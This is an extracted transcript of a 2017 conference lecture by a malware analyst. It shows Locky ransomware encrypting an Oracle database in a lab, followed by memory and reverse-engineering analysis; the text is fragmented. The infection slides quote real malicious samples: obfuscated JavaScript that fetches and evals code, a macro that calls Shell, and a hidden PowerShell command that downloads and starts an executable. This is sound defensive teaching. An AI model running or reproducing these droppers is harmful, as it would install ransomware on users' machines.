MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11...

AL

EX

AN

DR

E B

OR

GE

S –

IT

IS

NO

T A

LL

OW

ED

TO

CO

PY

NE

ITH

ER

RE

PR

OD

UC

E T

HIS

SL

IDE

.

1

GUOB TECH DAY 2017 – LA OTN TOUR

(INTRODUCTORY LECTURE FOR DBAs)

By Alexandre Borges

MALWARES ON WINDOWS AND LINUX: THE

WORST THREAT FOR DATABASES

PROFILE AND TOC

TOC:

• Introduction

• Infection

• Test Environment

• Memory Analysis

• Quick Dynamic and Static Analysis

• Last words

• Malware and Security Researcher.

• Consultant, Instructor and Speaker on Malware

Analysis, Memory Analysis, Digital Forensics,

Rootkits and Software Exploitation.

• Instructor at Oracle, (ISC)2 and EC-Council. Ex-

instructor at Symantec.

• Member of the CHFI Advisory Board in EC-Council.

• Reviewer member of the The Journal of Digital

Forensics, Security and Law.

• Refereer on Digital Investigation:The International

Journal of Digital Forensics & Incident Response

• Author of “Oracle Solaris Advanced Administration

book”

AL

EX

AN

DR

E B

OR

GE

S –

IT

IS

NO

T A

LL

OW

ED

TO

CO

PY

NE

ITH

ER

RE

PR

OD

UC

E T

HIS

SL

IDE

.

WARNING !!!

• Please, pay attention in the following considerations:

• It is NOT ALLOWED to take pictures of the slides.

• It is NOT ALLOWED to record the lecture.

• It is NOT ALLOWED to film the lecture.

• Please, respect the speaker and his material.

HTTP://ALEXANDREBORGES.ORG 3

AL

EX

AN

DR

E B

OR

GE

S –

IT

IS

NO

T A

LL

OW

ED

TO

CO

PY

NE

ITH

ER

RE

PR

OD

UC

E T

HIS

SL

IDE

.

INTRODUCTION


INTRODUCTION


• FACT: Malwares are destroying the digital world.

• Several types of malwares:

• Ring 3 (ransomwares included)

• Ring 0 (kernel and bootkits malwares)

• Ring -1 (VMM)

• Ring -2 (SMM)

• Ring -3 ? (Intel Management Engine)

• Number of malwares infecting BIOS / UEFI has been increasing.

• Malwares running on GPU

INTRODUCTION


• Malwares have used several tricks for making the detection harder than the

usual:

• Process hiding (DKOM)

• Process Replacement (Hollowing)

• DLL hiding (by manipulating _LDR_DATA_TABLE_ENTRY)

• Services hiding + Service Hijacking

• Hidden Sockets

• Code Injection (multiple methods)

• Hooking (code, IAT, EAT)

• Binary hidden in the Registry

INTRODUCTION

flink

101

blink

flink

102

blink

flink

103

blink

flink

103

blink

flink

102

blink

flink

101

blink

DKOM (Direct Kernel

Object Manipulation) on

the processes list.

INTRODUCTION


.....

push param3

push param2

push param1

call good_function

mov ebx, eax

....

push ebp

mov esp, ebp

...good things...

call bad_function

....

ret

push ebp

mov esp, ebp

...bad things...

ret

Basic Function Hooking

INTRODUCTION

• NtClose function (from ntdll.dll) being hooked:

0x7c90cfd0 b819000000 MOV EAX, 0x19

0x7c90cfd5 ba5000907c MOV EDX, 0x7c900050

0x7c90cfda ffd2 CALL EDX

0x7c90cfdc c20400 RET 0x4

0x7c90cfdf 90 NOP

0x7c90cfe0 b81a000000 MOV EAX, 0x1a

0x7c90cfe5 ba DB 0xba

0x7c90cfe6 0003 ADD [EBX], AL


Hooking

INTRODUCTION

0x7c900050 b203 MOV DL, 0x3

0x7c900052 eb08 JMP 0x7c90005c

0x7c900054 b204 MOV DL, 0x4

0x7c900056 eb04 JMP 0x7c90005c

0x7c900058 b205 MOV DL, 0x5

0x7c90005a eb00 JMP 0x7c90005c

0x7c90005c 52 PUSH EDX

0x7c90005d e804000000 CALL 0x7c900066

0x7c900062 f20094005aff2269 ADD [EAX+EAX+0x6922ff5a], DL

0x7c90006a 6e OUTS DX, BYTE [ESI]

.....


Hooking

Anti-disassembly

trick.

INTRODUCTION


• And about Injection techniques? There are many methods:

• Remote DLL Injection it is easily detected because the DLL

must be on disk before being injected.

• PE Injection a PE file, which has its IAT configured for the

target process, is written and forced to be executed into the

addressing space of the target process.

• Reflective Injection it is similar to the previous one, but the

code (usually a DLL) manages its initialization.

• APC Injection a malicious code is executed by attaching to an

APC (Asynchronous Procedure Call) of the target thread.

INTRODUCTION


• Other tricks:

• Hooking SSDT

• Hooking IDT

• Orphan Threads

• IRP Hooking

• Hiding kernel drivers

• Bypassing KCS (Kernel Code Signing)

• Callbacks

• Filtering Drivers

INTRODUCTION


• The analysis can be difficult because there are several anti -analysis techniques:

• Anti-Debugging

• Anti-Disassembly

• Anti-VMware

• Packers (common and virtualized ones)

• Obfuscation

• .NET tricks

• Powershell + WMI

INTRODUCTION


• There are many threats infecting firmwares, which are persistent and stealth.

• They can replace the OS boot loader, patch the kernel, and so on...

• Petya (MBR ransomware)

• Mebromi (BIOS rootkit)

• Gapz (BIOS parameter block modification)

• TDL4

INTRODUCTION


https://www.symantec.com/content/dam/symantec/docs/reports/istr-21-2016-en.pdf

INTRODUCTION


• http://privacy-pc.com/articles/ransomware-chronicle.html

INTRODUCTION - KASPERSKY OVERALL

STATISTICS FOR 2016


https://kasperskycontenthub.com/securelist/files/2016/12/Kaspersky_Security_Bulletin_

2016_Statistics_ENG.pdf

AL

EX

AN

DR

E B

OR

GE

S –

IT

IS

NO

T A

LL

OW

ED

TO

CO

PY

NE

ITH

ER

RE

PR

OD

UC

E T

HIS

SL

IDE

.

INTRODUCTION - SYMANTEC INTERNET

SECURITY THREAT REPORT 2016


https://www.symantec.com/content/dam/symantec/docs/reports/istr-21-2016-en.pdf

AL

EX

AN

DR

E B

OR

GE

S –

IT

IS

NO

T A

LL

OW

ED

TO

CO

PY

NE

ITH

ER

RE

PR

OD

UC

E T

HIS

SL

IDE

.

Huh? Are you sure

that Linux systems are

safe against malwares?

INFECTION


INFECTION


• Malwares have three main goals when they infect a system:

• Owning the system for using it in future attacks

• Stealing data

• Hijacking data (ransomwares)

• We know the main techniques for infection:

• E-mail

• USB

• Network sharing

• Exploiting vulnerabilities (remember WannaCry)

INFECTION


Click to die

INFECTION


Obfuscated code. However, it is trivial

to solve it.

INFECTION


Obfuscated code. Again, it is trivial to solve it.

INFECTION


• function nomusta(prototu){return prototu.replace(/AA/g,"");}

• var fuka = new

ActiveXObject(nomusta("MSXAAML2.XMLHTAATP")

• fuka.open(jacob[3-2],

""+malysh()+"://"+gerlk+'/'+greezno()+'?'+zemk, ghyt);

• XMLHttpRequest object

• Represents an XML request using HTTP.

• It has an open method that requests a synchronous or

asynchronous file download from a specific URL.

INFECTION


• XMLHttpRequest object also has a send method,

which sends an HTTP request to the server and

receives a response.

• function zulum(pikue) {pikue.send( );}

• zulum(fuka);

• function hust(gulibator){eval(gulibator);}

• hust(gusar);

INFECTION


Click to die

INFECTION


Probably, the malware’s author wants to execute something bad on your system.

INFECTION


Sub Document_Open( )

urgixbe = "gwefakqyrb"

If (odbumuwgi = 811) Then

If (osduzu = "icdyclaw") Then

….

hnevo = Shell(ibovuhl, unymk)

niwwyshomq = Empty

tnovgistoqme = "58732" & 18

sgukkezihh = "46106" & 81

...

Again, obfuscated code. Once more, It is very simple

to bypass it.

INFECTION


"CMD.exe /C "PoWersHELl.exE -eXecUTionPOliCy bypAss -

nOprOfiLE -WIndowstYlE HIDDen (new-ObJECT

SYStem.nET.WeBcLIent).downLOAdFilE('http://unityiestgen.top/

search.php','%appdaTA%.ExE');start-prOceSS

'%AppDatA%.Exe'""

I have not shown the desobfuscation process because it is really simple.

TEST ENVIRONMENT


TEST ENVIRONMENT


WINDOWS 8

x64 Internet

WINDOWS 8

x64

Oracle Database

12.2 installed

Oracle Instant Client

12.2 installed

NAT

TEST ENVIRONMENT


• LISTENER.ORA

TEST ENVIRONMENT


• TNSNAMES.ORA

TEST ENVIRONMENT


C:\instantclient_12_2> sqlplus system@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(Host=win81.example.com)(Port=1521))(CONNECT_DATA=(SID=orcl)))

Enter password: Malware123!

Connected to:

Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

SQL> select instance_name from v$instance;

INSTANCE_NAME

------------------------------------------------

orcl

TEST ENVIRONMENT


TEST ENVIRONMENT


Infected with Locky (version JUL/30/2017)

TEST ENVIRONMENT


TEST ENVIRONMENT


Encrypted database

files. On Windows,

you are lucky because

it prevents two

processes to alter the

same file at same time.

On Linux...no luck

TEST ENVIRONMENT


Photo from Twitter of my colleague Valerie Thomas (@hacktress09 )

After Oracle database being encrypted by the ransomware....

MEMORY ANALYSIS


MEMORY ANALYSIS


Probably, the ransomware is destroying snapshots

MEMORY ANALYSIS


Running as administrator

MEMORY ANALYSIS


DLLs that are responsible for

accessing the network/Internet ;)

32-bit code running on x64. Of course.

MEMORY ANALYSIS


Class Identifier registry. Is COM present?

Interesting Registry entries.

MEMORY ANALYSIS


Few URLs on the memory

MEMORY ANALYSIS


Locky ransomware connecting to C2 (Command

and Control Server).

MEMORY ANALYSIS


Russia...again?

MEMORY ANALYSIS


VAD Short and RWE.

Code Injection,of course.

VAD == Virtual Address

Descriptor)

MEMORY ANALYSIS


Three injected code saved on disk. Pay attention: three different hashes.

MEMORY ANALYSIS


Interesting string

references and DLLs.

MEMORY ANALYSIS


It is a hooking, but this

specific one is not

important right now

QUICK STATIC AND DYNAMIC

ANALYSIS


QUICK STATIC AND DYNAMIC ANALYSIS


It seems that our malware is the Locky

ransomware, isn’t it?



Take a look at

the entropy.

Boring to reverse



High entropy.



Encrypted

Overlay



MFC (Microsoft Foundation Class) It is a collection of classes commonly

used in object oriented programming. Usually, MFC could be though as a wrapper for

windows API (similar a “proxy” role) that are written in C++.

No import

names



The IDAPro shows us

all function names

inside the MFC42.dll ,

but the reversing

analysis is very boring.



There is not any

Crypto function.



Classic unpacking process, loading DLLs one by one.



These new segments are

coming from VirtualAlloc( )

calls. Eventually, it could be

the unpacked executable

that we are looking for.



They are good signs Therefore, we can save this dump to disk.



The Crypto

functions

have arisen!



At this point

your life changes

(desperately

looking for a

backup).



from CryptImportKey( )

from CryptCreateHash( )



CryptSetKeyParam(hOriginalKey, AB_IV, new_IV)

while(block = NextBlockEncoding())

{

hDuplicateKey = CryptDuplicateKey(hOriginalKey)

CryptEncrypt(hDuplicateKey, block)

CryptDestroyKey(hDuplicateKey)

}



Usual place to set up

the persistence.



Looking for all file extensions to

encrypt their respective files and this

data reference is the list of all them!



Few extensions that are looked

by the ransomware and, among

them, .dbf (from Oracle

databases).



Connect to author’s

server using username

and password.



We could use

Wireshark, couldn’t we ?

REMEMBER


We are always in CONTROL...

THANK YOU FOR ATTENDING MY LECTURE!

LinkedIn: http://www.linkedin.com/in/aleborges

Twitter: @ale_sp_brazil

Blog: http://alexandreborges.org

E-mail: [email protected]

• Malware and Security Researcher.

• Consultant, Instructor and Speaker on Malware

Analysis, Memory Analysis, Digital Forensics,

Rootkits and Software Exploitation.

• Instructor at Oracle, (ISC)2 and EC-Council. Ex-

instructor at Symantec.

• Member of the CHFI Advisory Board in EC-Council.

• Reviewer member of the The Journal of Digital

Forensics, Security and Law

• Refereer on Digital Investigation:The International

Journal of Digital Forensics & Incident Response

• Author of “Oracle Solaris Advanced Administration

book”

MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11...

Documents

Transcript of MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11...